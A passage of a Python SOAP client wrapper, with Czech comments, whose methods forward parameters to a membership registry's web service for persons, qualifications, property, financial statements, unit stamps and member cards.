return self._client.service.PersonUpdate({"ID_Login": ID_Login, "ID": ID, "Birthday": Birthday, "BirthdayYear": BirthdayYear, "IsForeign": IsForeign, "YearFrom": YearFrom, "ID_User": ID_User, "OnlyValidate": OnlyValidate, "IsPostalAuthenticated": IsPostalAuthenticated, "IsAddressAuthenticated": IsAddressAuthenticated, "RejectDataStorage": RejectDataStorage, "IdentificationCodeForce": IdentificationCodeForce, "GenerateSecurityCode": GenerateSecurityCode, "ID_TempFile": ID_TempFile, "ID_PersonPhotoBig": ID_PersonPhotoBig, "ID_PersonPhotoMedium": ID_PersonPhotoMedium, "ID_PersonPhotoNormal": ID_PersonPhotoNormal, "ID_PersonPhotoSmall": ID_PersonPhotoSmall, "IdentificationCode": IdentificationCode, "FirstName": FirstName, "LastName": LastName, "NickName": NickName, "Address": Address, "Street": Street, "City": City, "Postcode": Postcode, "State": State, "PostalFirstLine": PostalFirstLine, "PostalAddress": PostalAddress, "PostalStreet": PostalStreet, "PostalCity": PostalCity, "PostalPostcode": PostalPostcode, "PostalState": PostalState, "Note": Note, "ID_Sex": ID_Sex, "RegistrationNumber": RegistrationNumber, "PhotoExtension": PhotoExtension, "PhotoContent": PhotoContent, "MaidenName": MaidenName, "AddressDistrict": AddressDistrict, "PostalDistrict": PostalDistrict, "UnitEnrollExtension": UnitEnrollExtension, "UnitEnroll": UnitEnroll})
# Načíst seznam kvalifikací
def QualificationAll(self, ShowHistory, ID_Login, ID_Person, ID_QualificationType, IsValid, QualificationTypeKey=None):
return self._client.service.QualificationAll({"ShowHistory": ShowHistory, "ID_Login": ID_Login, "ID_Person": ID_Person, "ID_QualificationType": ID_QualificationType, "IsValid": IsValid, "QualificationTypeKey": QualificationTypeKey})
# Načíst detail kvalifikace
def QualificationDetail(self, ID_Login, ID):
return self._client.service.QualificationDetail({"ID_Login": ID_Login, "ID": ID})
# Založit kvalifikaci
def QualificationInsert(self, ID_Login, ID_Person, ID, ValidFrom, ValidTo, ID_QualificationType, IsUsed, SendMessage, ID_Document, Person=None, QualificationType=None, LetterNumber=None, Note=None):
return self._client.service.QualificationInsert({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_QualificationType": ID_QualificationType, "IsUsed": IsUsed, "SendMessage": SendMessage, "ID_Document": ID_Document, "Person": Person, "QualificationType": QualificationType, "LetterNumber": LetterNumber, "Note": Note})
# Načíst seznam typů kvalfikace
def QualificationTypeAll(self, ID_Login, IsExam, ShowManualIssue, DisplayName=None):
return self._client.service.QualificationTypeAll({"ID_Login": ID_Login, "IsExam": IsExam, "ShowManualIssue": ShowManualIssue, "DisplayName": DisplayName})
# Upravit kvalifikaci
def QualificationUpdate(self, ID_Login, ID_Person, ID, ValidFrom, ValidTo, ID_QualificationType, IsUsed, SendMessage, ID_Document, Person=None, QualificationType=None, LetterNumber=None, Note=None):
return self._client.service.QualificationUpdate({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_QualificationType": ID_QualificationType, "IsUsed": IsUsed, "SendMessage": SendMessage, "ID_Document": ID_Document, "Person": Person, "QualificationType": QualificationType, "LetterNumber": LetterNumber, "Note": Note})
# Načíst seznam nemovitostí
def RealtyAll(self, ID_Login, ID, ID_RealtyType, SearchByCity, SearchByName, SearchString=None):
return self._client.service.RealtyAll({"ID_Login": ID_Login, "ID": ID, "ID_RealtyType": ID_RealtyType, "SearchByCity": SearchByCity, "SearchByName": SearchByName, "SearchString": SearchString})
# Načíst detail nemovitosti
def RealtyDetail(self, ID_Login, ID):
return self._client.service.RealtyDetail({"ID_Login": ID_Login, "ID": ID})
# Založit nemovitost
def RealtyInsert(self, ID_Login, ID, ID_RealtyType, GpsLatitude, GpsLongitude, ID_RealtyCollection, IsPower, ValidTo, IsActive, ID_TempFilePhoto, IsAddressAuthenticated, ID_Document, LVNumber, Acreage, RealtyGpsLatitude, RealtyGpsLongitude, CoordinateX, CoordinateY, DisplayName=None, RealtyType=None, Street=None, City=None, Postcode=None, Description=None, Note=None, RealtyCollection=None, ID_OwnerType=None, OwnerType=None, OwnerTypeNote=None, PhotoExtension=None, PhotoFileContent=None, FotogalleryUrl=None, District=None, Storage=None, ParcelNumber=None, RegisterCity=None, CadastralArea=None, ParcelType=None, LandType=None, Unit=None, UnitRegistrationNumber=None):
return self._client.service.RealtyInsert({"ID_Login": ID_Login, "ID": ID, "ID_RealtyType": ID_RealtyType, "GpsLatitude": GpsLatitude, "GpsLongitude": GpsLongitude, "ID_RealtyCollection": ID_RealtyCollection, "IsPower": IsPower, "ValidTo": ValidTo, "IsActive": IsActive, "ID_TempFilePhoto": ID_TempFilePhoto, "IsAddressAuthenticated": IsAddressAuthenticated, "ID_Document": ID_Document, "LVNumber": LVNumber, "Acreage": Acreage, "RealtyGpsLatitude": RealtyGpsLatitude, "RealtyGpsLongitude": RealtyGpsLongitude, "CoordinateX": CoordinateX, "CoordinateY": CoordinateY, "DisplayName": DisplayName, "RealtyType": RealtyType, "Street": Street, "City": City, "Postcode": Postcode, "Description": Description, "Note": Note, "RealtyCollection": RealtyCollection, "ID_OwnerType": ID_OwnerType, "OwnerType": OwnerType, "OwnerTypeNote": OwnerTypeNote, "PhotoExtension": PhotoExtension, "PhotoFileContent": PhotoFileContent, "FotogalleryUrl": FotogalleryUrl, "District": District, "Storage": Storage, "ParcelNumber": ParcelNumber, "RegisterCity": RegisterCity, "CadastralArea": CadastralArea, "ParcelType": ParcelType, "LandType": LandType, "Unit": Unit, "UnitRegistrationNumber": UnitRegistrationNumber})
# Načíst seznam typů nemovitostí
def RealtyTypeAll(self, ID_Login, ID_Application, DisplayName=None):
return self._client.service.RealtyTypeAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "DisplayName": DisplayName})
# Upravit nemovitost
def RealtyUpdate(self, ID_Login, ID, ID_RealtyType, GpsLatitude, GpsLongitude, ID_RealtyCollection, IsPower, ValidTo, IsActive, ID_TempFilePhoto, IsAddressAuthenticated, ID_Document, LVNumber, Acreage, RealtyGpsLatitude, RealtyGpsLongitude, CoordinateX, CoordinateY, DisplayName=None, RealtyType=None, Street=None, City=None, Postcode=None, Description=None, Note=None, RealtyCollection=None, ID_OwnerType=None, OwnerType=None, OwnerTypeNote=None, PhotoExtension=None, PhotoFileContent=None, FotogalleryUrl=None, District=None, Storage=None, ParcelNumber=None, RegisterCity=None, CadastralArea=None, ParcelType=None, LandType=None, Unit=None, UnitRegistrationNumber=None):
return self._client.service.RealtyUpdate({"ID_Login": ID_Login, "ID": ID, "ID_RealtyType": ID_RealtyType, "GpsLatitude": GpsLatitude, "GpsLongitude": GpsLongitude, "ID_RealtyCollection": ID_RealtyCollection, "IsPower": IsPower, "ValidTo": ValidTo, "IsActive": IsActive, "ID_TempFilePhoto": ID_TempFilePhoto, "IsAddressAuthenticated": IsAddressAuthenticated, "ID_Document": ID_Document, "LVNumber": LVNumber, "Acreage": Acreage, "RealtyGpsLatitude": RealtyGpsLatitude, "RealtyGpsLongitude": RealtyGpsLongitude, "CoordinateX": CoordinateX, "CoordinateY": CoordinateY, "DisplayName": DisplayName, "RealtyType": RealtyType, "Street": Street, "City": City, "Postcode": Postcode, "Description": Description, "Note": Note, "RealtyCollection": RealtyCollection, "ID_OwnerType": ID_OwnerType, "OwnerType": OwnerType, "OwnerTypeNote": OwnerTypeNote, "PhotoExtension": PhotoExtension, "PhotoFileContent": PhotoFileContent, "FotogalleryUrl": FotogalleryUrl, "District": District, "Storage": Storage, "ParcelNumber": ParcelNumber, "RegisterCity": RegisterCity, "CadastralArea": CadastralArea, "ParcelType": ParcelType, "LandType": LandType, "Unit": Unit, "UnitRegistrationNumber": UnitRegistrationNumber})
# Načíst seznam registračních kategorií
def RegistrationCategoryAll(self, ID_Login, ID_UnitRegistration, ID_RegistrationCategoryParent, ShowParentUnit, ShowUsable, IsAfterDeadline, DisplayName=None, ID_MembershipType=None):
return self._client.service.RegistrationCategoryAll({"ID_Login": ID_Login, "ID_UnitRegistration": ID_UnitRegistration, "ID_RegistrationCategoryParent": ID_RegistrationCategoryParent, "ShowParentUnit": ShowParentUnit, "ShowUsable": ShowUsable, "IsAfterDeadline": IsAfterDeadline, "DisplayName": DisplayName, "ID_MembershipType": ID_MembershipType})
# Smazat registrační kategorii
def RegistrationCategoryDelete(self, ID_Login, ID):
return self._client.service.RegistrationCategoryDelete({"ID_Login": ID_Login, "ID": ID})
# Založit registrační kategorii
def RegistrationCategoryInsert(self, ID_Login, ID_UnitRegistration, ID_RegistrationCategoryParent, Amount, IsAfterDeadline, IsJournal, DisplayName=None, ID_MembershipType=None, Note=None):
return self._client.service.RegistrationCategoryInsert({"ID_Login": ID_Login, "ID_UnitRegistration": ID_UnitRegistration, "ID_RegistrationCategoryParent": ID_RegistrationCategoryParent, "Amount": Amount, "IsAfterDeadline": IsAfterDeadline, "IsJournal": IsJournal, "DisplayName": DisplayName, "ID_MembershipType": ID_MembershipType, "Note": Note})
# Načíst seznam pohlaví
def SexAll(self, ID_Login, ID_Application, DisplayName=None):
return self._client.service.SexAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "DisplayName": DisplayName})
# Načíst seznam hospodářských výkazů
def StatementAll(self, ID_Login, ID_Unit, Year, ID_StatementType=None):
return self._client.service.StatementAll({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "Year": Year, "ID_StatementType": ID_StatementType})
# Smazat hospodářský výkaz
def StatementDelete(self, ID_Login, ID):
return self._client.service.StatementDelete({"ID_Login": ID_Login, "ID": ID})
# Načíst detail hospodářského výkazu
def StatementDetail(self, ID_Login, ID):
return self._client.service.StatementDetail({"ID_Login": ID_Login, "ID": ID})
# Načíst seznam položek hospodářského výkazu
def StatementEntryAll(self, ID_Login, ID_Statement, ID_StatementEntryType, IsMoney):
return self._client.service.StatementEntryAll({"ID_Login": ID_Login, "ID_Statement": ID_Statement, "ID_StatementEntryType": ID_StatementEntryType, "IsMoney": IsMoney})
# Načíst seznam závěrkových položky
def StatementEntryTypeAll(self, ID_Login, DisplayName=None, ID_StatementType=None):
return self._client.service.StatementEntryTypeAll({"ID_Login": ID_Login, "DisplayName": DisplayName, "ID_StatementType": ID_StatementType})
# Upravit položku hospodářského výkazu
def StatementEntryUpdate(self, ID_Login, ID, ID_Statement, ID_StatementEntryType, Amount, AmountLastYear, AmountMain, AmountEconomic):
return self._client.service.StatementEntryUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Statement": ID_Statement, "ID_StatementEntryType": ID_StatementEntryType, "Amount": Amount, "AmountLastYear": AmountLastYear, "AmountMain": AmountMain, "AmountEconomic": AmountEconomic})
# Založit hospodářský výkaz
def StatementInsert(self, ID_Login, ID, ID_Unit, Year, IsError, IsDelivered, DateDelivered, DateCreated, IsThousands, IsConsultant, ID_Document, ID_DocumentTempFile, DateSent, ID_PersonSent, DateConfirmed, ID_PersonConfirmed, ID_Registry, ShowOverview, Unit=None, RegistrationNumber=None, ID_StatementType=None, StatementType=None, ID_StatementState=None, StatementState=None, PersonSent=None, PersonConfirmed=None):
return self._client.service.StatementInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Year": Year, "IsError": IsError, "IsDelivered": IsDelivered, "DateDelivered": DateDelivered, "DateCreated": DateCreated, "IsThousands": IsThousands, "IsConsultant": IsConsultant, "ID_Document": ID_Document, "ID_DocumentTempFile": ID_DocumentTempFile, "DateSent": DateSent, "ID_PersonSent": ID_PersonSent, "DateConfirmed": DateConfirmed, "ID_PersonConfirmed": ID_PersonConfirmed, "ID_Registry": ID_Registry, "ShowOverview": ShowOverview, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_StatementType": ID_StatementType, "StatementType": StatementType, "ID_StatementState": ID_StatementState, "StatementState": StatementState, "PersonSent": PersonSent, "PersonConfirmed": PersonConfirmed})
# Načíst seznam typů hospodářského výkazu
def StatementTypeAll(self, ID_Login, DisplayName=None):
return self._client.service.StatementTypeAll({"ID_Login": ID_Login, "DisplayName": DisplayName})
# Načíst seznam evidencí provedených kontrol
def UnitAuditRegisterAll(self, ID_Login, ID, ID_Unit):
return self._client.service.UnitAuditRegisterAll({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit})
# Načíst detail evidence provedené kontroly
def UnitAuditRegisterDetail(self, ID_Login, ID):
return self._client.service.UnitAuditRegisterDetail({"ID_Login": ID_Login, "ID": ID})
# Založit evidenci provedené kontroly
def UnitAuditRegisterInsert(self, ID_Login, ID, ID_Unit, Year, ID_DocumentReport, ID_PersonReport, ReportDone, ID_DocumentAudit, ID_PersonAudit, AuditDone, ID_TempFileReport, ID_TempFileAudit, Unit=None, RegistrationNumber=None, PersonReport=None, ReportText=None, PersonAudit=None, AuditText=None):
return self._client.service.UnitAuditRegisterInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Year": Year, "ID_DocumentReport": ID_DocumentReport, "ID_PersonReport": ID_PersonReport, "ReportDone": ReportDone, "ID_DocumentAudit": ID_DocumentAudit, "ID_PersonAudit": ID_PersonAudit, "AuditDone": AuditDone, "ID_TempFileReport": ID_TempFileReport, "ID_TempFileAudit": ID_TempFileAudit, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "PersonReport": PersonReport, "ReportText": ReportText, "PersonAudit": PersonAudit, "AuditText": AuditText})
# Zadat soubory
def UnitAuditRegisterUpdate(self, ID_Login, ID, ID_Unit, Year, ID_DocumentReport, ID_PersonReport, ReportDone, ID_DocumentAudit, ID_PersonAudit, AuditDone, ID_TempFileReport, ID_TempFileAudit, Unit=None, RegistrationNumber=None, PersonReport=None, ReportText=None, PersonAudit=None, AuditText=None):
return self._client.service.UnitAuditRegisterUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Year": Year, "ID_DocumentReport": ID_DocumentReport, "ID_PersonReport": ID_PersonReport, "ReportDone": ReportDone, "ID_DocumentAudit": ID_DocumentAudit, "ID_PersonAudit": ID_PersonAudit, "AuditDone": AuditDone, "ID_TempFileReport": ID_TempFileReport, "ID_TempFileAudit": ID_TempFileAudit, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "PersonReport": PersonReport, "ReportText": ReportText, "PersonAudit": PersonAudit, "AuditText": AuditText})
# Načtení informací o slevovém kódu jednotky
def UnitDetailShopDiscount(self, ID_Login, ID, ID_Person):
return self._client.service.UnitDetailShopDiscount({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person})
# Načíst seznam důvodů založení jednotky
def UnitFoundReasonAll(self, ID_Login, ID=None, DisplayName=None):
return self._client.service.UnitFoundReasonAll({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
# Načíst seznam adres
def UnitJournalDeliveryAll(self, ID_Login, ID, ID_Unit):
return self._client.service.UnitJournalDeliveryAll({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit})
# Načíst detail adresy
def UnitJournalDeliveryDetail(self, ID_Login, ID, ID_Unit, ID_Person, Unit=None, RegistrationNumber=None, Street=None, Ciry=None, PostCode=None, FirstLine=None, State=None, ID_JournalDeliveryType=None):
return self._client.service.UnitJournalDeliveryDetail({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Person": ID_Person, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "Street": Street, "Ciry": Ciry, "PostCode": PostCode, "FirstLine": FirstLine, "State": State, "ID_JournalDeliveryType": ID_JournalDeliveryType})
# Založit adresu
def UnitJournalDeliveryInsert(self, ID_Login, ID, ID_Unit, ID_Person, Unit=None, RegistrationNumber=None, Street=None, Ciry=None, PostCode=None, FirstLine=None, State=None, ID_JournalDeliveryType=None):
return self._client.service.UnitJournalDeliveryInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Person": ID_Person, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "Street": Street, "Ciry": Ciry, "PostCode": PostCode, "FirstLine": FirstLine, "State": State, "ID_JournalDeliveryType": ID_JournalDeliveryType})
# Upravit adresu
def UnitJournalDeliveryUpdate(self, ID_Login, ID, ID_Unit, ID_Person, Unit=None, RegistrationNumber=None, Street=None, Ciry=None, PostCode=None, FirstLine=None, State=None, ID_JournalDeliveryType=None):
return self._client.service.UnitJournalDeliveryUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Person": ID_Person, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "Street": Street, "Ciry": Ciry, "PostCode": PostCode, "FirstLine": FirstLine, "State": State, "ID_JournalDeliveryType": ID_JournalDeliveryType})
# Načíst seznam razítek jednotky
def UnitStampAll(self, ID_Login, ID_Unit, ID, ID_StampType=None):
return self._client.service.UnitStampAll({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID": ID, "ID_StampType": ID_StampType})
# Smazat razítko jednotky
def UnitStampDelete(self, ID_Login, ID):
return self._client.service.UnitStampDelete({"ID_Login": ID_Login, "ID": ID})
# Načíst detail razítka jednotky
def UnitStampDetail(self, ID_Login, ID):
return self._client.service.UnitStampDetail({"ID_Login": ID_Login, "ID": ID})
# Založit razítko jednotky
def UnitStampInsert(self, ID_Login, ID, ID_Unit, Count, Unit=None, RegistrationNumber=None, ID_StampType=None, StampType=None, Email=None, Web=None):
return self._client.service.UnitStampInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Count": Count, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_StampType": ID_StampType, "StampType": StampType, "Email": Email, "Web": Web})
# Upravit razítko jednotky
def UnitStampUpdate(self, ID_Login, ID, ID_Unit, Count, Unit=None, RegistrationNumber=None, ID_StampType=None, StampType=None, Email=None, Web=None):
return self._client.service.UnitStampUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Count": Count, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_StampType": ID_StampType, "StampType": StampType, "Email": Email, "Web": Web})
# Nastavit typ rozesílky balíčků pro nováčky
def UnitUpdateJournalDeliveryType(self, ID_Login, ID, ID_JournalDeliveryType=None):
return self._client.service.UnitUpdateJournalDeliveryType({"ID_Login": ID_Login, "ID": ID, "ID_JournalDeliveryType": ID_JournalDeliveryType})
# Nastavit způsob odběru balíčků pro nováčky
def UnitUpdateChangeJournalNovice(self, ID_Login, ID, ID_JournalNovice=None):
return self._client.service.UnitUpdateChangeJournalNovice({"ID_Login": ID_Login, "ID": ID, "ID_JournalNovice": ID_JournalNovice})
# Upravit jméno jednotky
def UnitUpdateName(self, ID_Login, ID, ID_Group, ID_Unit, ContainsMembers, CommissionDeadline, IsVatPayer, ID_TroopArt, CanUpdateRegistrationNumber, IsUnitCancel, JournalParent, ChangeFreeJournal, ID_UnitParent, OnlyValidate, IsPostalAuthenticated, IsAddressAuthenticated, ID_PersonChangeName, DateChangeName, IsPropertyOwner, ID_TempFilePropertyAgreement, ID_DocumentDecision, ID_DocumentPropertyAgreement, ID_TempFileSeatChange, ID_UnitType=None, UnitType=None, DisplayName=None, SortName=None, RegistrationNumber=None, ShortRegistrationNumber=None, Location=None, IC=None, DIC=None, FileReference=None, Street=None, City=None, Postcode=None, State=None, PostalFirstLine=None, PostalStreet=None, PostalCity=None, PostalPostcode=None, PostalState=None, Note=None, TroopArt=None, LogoContent=None, LogoExtension=None, AddressDistrict=None, PostalDistrict=None, NewDisplayName=None, CompleteDisplayName=None, PersonChangeName=None, PropertyAgreementExtension=None, PropertyAgreementContent=None, TroopArtKey=None, ID_JournalNovice=None, ID_JournalDeliveryType=None, FullDisplayName=None, DecisionSeatChangeExtension=None, ShopDiscountBarcode=None, ID_UnitFoundReason=None, UnitFoundReason=None, UnitFoundDescription=None):
return self._client.service.UnitUpdateName({"ID_Login": ID_Login, "ID": ID, "ID_Group": ID_Group, "ID_Unit": ID_Unit, "ContainsMembers": ContainsMembers, "CommissionDeadline": CommissionDeadline, "IsVatPayer": IsVatPayer, "ID_TroopArt": ID_TroopArt, "CanUpdateRegistrationNumber": CanUpdateRegistrationNumber, "IsUnitCancel": IsUnitCancel, "JournalParent": JournalParent, "ChangeFreeJournal": ChangeFreeJournal, "ID_UnitParent": ID_UnitParent, "OnlyValidate": OnlyValidate, "IsPostalAuthenticated": IsPostalAuthenticated, "IsAddressAuthenticated": IsAddressAuthenticated, "ID_PersonChangeName": ID_PersonChangeName, "DateChangeName": DateChangeName, "IsPropertyOwner": IsPropertyOwner, "ID_TempFilePropertyAgreement": ID_TempFilePropertyAgreement, "ID_DocumentDecision": ID_DocumentDecision, "ID_DocumentPropertyAgreement": ID_DocumentPropertyAgreement, "ID_TempFileSeatChange": ID_TempFileSeatChange, "ID_UnitType": ID_UnitType, "UnitType": UnitType, "DisplayName": DisplayName, "SortName": SortName, "RegistrationNumber": RegistrationNumber, "ShortRegistrationNumber": ShortRegistrationNumber, "Location": Location, "IC": IC, "DIC": DIC, "FileReference": FileReference, "Street": Street, "City": City, "Postcode": Postcode, "State": State, "PostalFirstLine": PostalFirstLine, "PostalStreet": PostalStreet, "PostalCity": PostalCity, "PostalPostcode": PostalPostcode, "PostalState": PostalState, "Note": Note, "TroopArt": TroopArt, "LogoContent": LogoContent, "LogoExtension": LogoExtension, "AddressDistrict": AddressDistrict, "PostalDistrict": PostalDistrict, "NewDisplayName": NewDisplayName, "CompleteDisplayName": CompleteDisplayName, "PersonChangeName": PersonChangeName, "PropertyAgreementExtension": PropertyAgreementExtension, "PropertyAgreementContent": PropertyAgreementContent, "TroopArtKey": TroopArtKey, "ID_JournalNovice": ID_JournalNovice, "ID_JournalDeliveryType": ID_JournalDeliveryType, "FullDisplayName": FullDisplayName, "DecisionSeatChangeExtension": DecisionSeatChangeExtension, "ShopDiscountBarcode": ShopDiscountBarcode, "ID_UnitFoundReason": ID_UnitFoundReason, "UnitFoundReason": UnitFoundReason, "UnitFoundDescription": UnitFoundDescription})
# Ukončit platnost účtu
def AccountUpdateCancel(self, ID_Login, ID, ID_Unit, ValidTo, ID_Bank, IsMain, DisplayName=None, Unit=None, Bank=None, AccountPrefix=None, AccountNumber=None, Street=None, City=None, Postcode=None, Note=None):
return self._client.service.AccountUpdateCancel({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ValidTo": ValidTo, "ID_Bank": ID_Bank, "IsMain": IsMain, "DisplayName": DisplayName, "Unit": Unit, "Bank": Bank, "AccountPrefix": AccountPrefix, "AccountNumber": AccountNumber, "Street": Street, "City": City, "Postcode": Postcode, "Note": Note})
# Načíst seznam věkových kategorií
def AgeCategoryAll(self, ID_Login, IsMore):
return self._client.service.AgeCategoryAll({"ID_Login": ID_Login, "IsMore": IsMore})
# Načíst seznam ústředních orgánů
def AgencyAll(self, ID_Login, ID, DisplayName=None):
return self._client.service.AgencyAll({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
# Načíst seznam členských karet
def MemberCardAll(self, ID_Login, ID_Person, ID, ID_PersonSchool, ID_MemberCardState=None, DisplayName=None, ID_MemberCardType=None):
return self._client.service.MemberCardAll({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "ID_PersonSchool": ID_PersonSchool, "ID_MemberCardState": ID_MemberCardState, "DisplayName": DisplayName, "ID_MemberCardType": ID_MemberCardType})
# Smazat členskou kartu
def MemberCardDelete(self, ID_Login, ID):
return self._client.service.MemberCardDelete({"ID_Login": ID_Login, "ID": ID})
# Načíst detail členské karty
def MemberCardDetail(self, ID_Login, ID, DisplayName=None):
return self._client.service.MemberCardDetail({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
# Založit členskou kartu
def MemberCardInsert(self, ID_Login, ID, ID_Person, Birthday, Year, DateCreate, Price, IsAuthorized, IsPaid, ValidFrom, ValidTo, ID_PersonSchool, ID_PersonRegistration, ID_DocumentMediumPhoto, ID_MemberCardState=None, MemberCardState=None, DisplayName=None, Person=None, ID_MemberCardType=None, MemberCardType=None, PersonSchool=None, PersonSchoolCity=None, UnitStredisko=None, LeaderContact=None, StorageMediumPhoto=None):
return self._client.service.MemberCardInsert({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "Birthday": Birthday, "Year": Year, "DateCreate": DateCreate, "Price": Price, "IsAuthorized": IsAuthorized, "IsPaid": IsPaid, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_PersonSchool": ID_PersonSchool, "ID_PersonRegistration": ID_PersonRegistration, "ID_DocumentMediumPhoto": ID_DocumentMediumPhoto, "ID_MemberCardState": ID_MemberCardState, "MemberCardState": MemberCardState, "DisplayName": DisplayName, "Person": Person, "ID_MemberCardType": ID_MemberCardType, "MemberCardType": MemberCardType, "PersonSchool": PersonSchool, "PersonSchoolCity": PersonSchoolCity, "UnitStredisko": UnitStredisko, "LeaderContact": LeaderContact, "StorageMediumPhoto": StorageMediumPhoto})
# Upravit členskou kartu
def MemberCardUpdate(self, ID_Login, ID, ID_Person, Birthday, Year, DateCreate, Price, IsAuthorized, IsPaid, ValidFrom, ValidTo, ID_PersonSchool, ID_PersonRegistration, ID_DocumentMediumPhoto, ID_MemberCardState=None, MemberCardState=None, DisplayName=None, Person=None, ID_MemberCardType=None, MemberCardType=None, PersonSchool=None, PersonSchoolCity=None, UnitStredisko=None, LeaderContact=None, StorageMediumPhoto=None):
return self._client.service.MemberCardUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "Birthday": Birthday, "Year": Year, "DateCreate": DateCreate, "Price": Price, "IsAuthorized": IsAuthorized, "IsPaid": IsPaid, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_PersonSchool": ID_PersonSchool, "ID_PersonRegistration": ID_PersonRegistration, "ID_DocumentMediumPhoto": ID_DocumentMediumPhoto, "ID_MemberCardState": ID_MemberCardState, "MemberCardState": MemberCardState, "DisplayName": DisplayName, "Person": Person, "ID_MemberCardType": ID_MemberCardType, "MemberCardType": MemberCardType, "PersonSchool": PersonSchool, "PersonSchoolCity": PersonSchoolCity, "UnitStredisko": UnitStredisko, "LeaderContact": LeaderContact, "StorageMediumPhoto": StorageMediumPhoto})
# Objednat ztracenou kartu
def MemberCardUpdateRerequest(self, ID_Login, ID, ID_Person, Birthday, Year, DateCreate, Price, IsAuthorized, IsPaid, ValidFrom, ValidTo, ID_PersonSchool, ID_PersonRegistration, ID_DocumentMediumPhoto, ID_MemberCardState=None, MemberCardState=None, DisplayName=None, Person=None, ID_MemberCardType=None, MemberCardType=None, PersonSchool=None, PersonSchoolCity=None, UnitStredisko=None, LeaderContact=None, StorageMediumPhoto=None):
return self._client.service.MemberCardUpdateRerequest({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "Birthday": Birthday, "Year": Year, "DateCreate": DateCreate, "Price": Price, "IsAuthorized": IsAuthorized, "IsPaid": IsPaid, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_PersonSchool": ID_PersonSchool, "ID_PersonRegistration": ID_PersonRegistration, "ID_DocumentMediumPhoto": ID_DocumentMediumPhoto, "ID_MemberCardState": ID_MemberCardState, "MemberCardState": MemberCardState, "DisplayName": DisplayName, "Person": Person, "ID_MemberCardType": ID_MemberCardType, "MemberCardType": MemberCardType, "PersonSchool": PersonSchool, "PersonSchoolCity": PersonSchoolCity, "UnitStredisko": UnitStredisko, "LeaderContact": LeaderContact, "StorageMediumPhoto": StorageMediumPhoto})
# Načíst kartu, na kterou má osoba právo
def PersonDetailMemberCard(self, ID_Login, ID):
return self._client.service.PersonDetailMemberCard({"ID_Login": ID_Login, "ID": ID})
# Načíst aktuální potvrzení o studiu
def PersonDetailSchool(self, ID_Login, ID):
return self._client.service.PersonDetailSchool({"ID_Login": ID_Login, "ID": ID})
# Smazat potvrzení o studiu
def PersonSchoolDelete(self, ID_Login, ID):
return self._client.service.PersonSchoolDelete({"ID_Login": ID_Login, "ID": ID})
# Založit potvrzení o studiu
def PersonSchoolInsert(self, ID_Login, ID, ID_Person, DateCreate, ID_TempFile, ID_PersonSchoolTempFile, ID_DocumentPhoto, ID_DocumentScan, Person=None, DisplayName=None, City=None, Extension=None, Scan=None, PhotoExtension=None, Photo=None):
return self._client.service.PersonSchoolInsert({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "DateCreate": DateCreate, "ID_TempFile": ID_TempFile, "ID_PersonSchoolTempFile": ID_PersonSchoolTempFile, "ID_DocumentPhoto": ID_DocumentPhoto, "ID_DocumentScan": ID_DocumentScan, "Person": Person, "DisplayName": DisplayName, "City": City, "Extension": Extension, "Scan": Scan, "PhotoExtension": PhotoExtension, "Photo": Photo})
# Načíst detail registrační vady osoby
def PersonMistakeReportDetail(self, ID_Login, ID):
return self._client.service.PersonMistakeReportDetail({"ID_Login": ID_Login, "ID": ID})
# Upravit registrační vadu osoby
def PersonMistakeReportUpdate(self, ID_Login, ID, ID_Person, ID_Unit, ID_UnitRegistration, ID_Mistake, Person=None, UnitRegistrationNumber=None, Unit=None, Mistake=None, DisplayName=None, ParentComment=None):
return self._client.service.PersonMistakeReportUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_UnitRegistration": ID_UnitRegistration, "ID_Mistake": ID_Mistake, "Person": Person, "UnitRegistrationNumber": UnitRegistrationNumber, "Unit": Unit, "Mistake": Mistake, "DisplayName": DisplayName, "ParentComment": ParentComment})
# Načíst celkový počet odvodů za doplňkové služby pro nadřízenou jednotku
def PersonRegistrationServiceAllSummary(self, ID_Login, ID_UnitRegistration):
return self._client.service.PersonRegistrationServiceAllSummary({"ID_Login": ID_Login, "ID_UnitRegistration": ID_UnitRegistration})
